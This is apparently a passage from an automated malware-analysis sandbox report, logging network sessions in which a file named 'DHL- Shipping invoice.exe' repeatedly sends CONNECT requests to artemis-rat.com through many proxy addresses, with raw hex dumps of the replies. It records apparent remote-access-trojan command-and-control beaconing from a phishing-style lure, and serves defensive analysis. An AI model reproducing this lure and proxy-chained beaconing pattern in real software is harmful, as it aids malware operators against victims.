                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;b


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            186192.168.2.45053737.120.173.12493536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.537369013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            187192.168.2.44976437.26.223.9690806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.538216114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.795793056 CET806INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Server: Apache/2.4.18 (Ubuntu)
                            Content-Length: 614
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            188192.168.2.450398148.72.215.79115466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.540653944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.312235117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.452893972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.750178099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.344023943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.953181982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.640732050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.750224113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.952929020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            189192.168.2.4506574.236.183.3780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.550069094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            190192.168.2.450659104.21.218.103806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.551192045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.638572931 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            191192.168.2.450542147.75.34.83100066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.551422119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.719641924 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            192192.168.2.45057551.15.242.20288886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.553298950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            193192.168.2.45057746.35.9.110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.556570053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            194192.168.2.450678104.23.100.73806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.563730001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.650880098 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            195192.168.2.450423103.63.190.7280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.567982912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.930813074 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            196192.168.2.450631136.244.99.5188886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.575210094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.743815899 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.22.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            197192.168.2.4506813.12.144.14631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.584192991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.688131094 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            198192.168.2.45048461.111.38.5806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.587887049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.870208979 CET507INHTTP/1.1 502 Proxy Error
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Server: Apache
                            Content-Length: 341
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            199192.168.2.450428111.224.213.2080896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.590976954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            200192.168.2.450644188.166.56.246806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.592945099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.356228113 CET806INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: Apache/2.4.38 (Debian)
                            Content-Length: 614
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 6d 61 78 6c 65 67 67 69 65 72 69 40 67 6d 61 69 6c 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 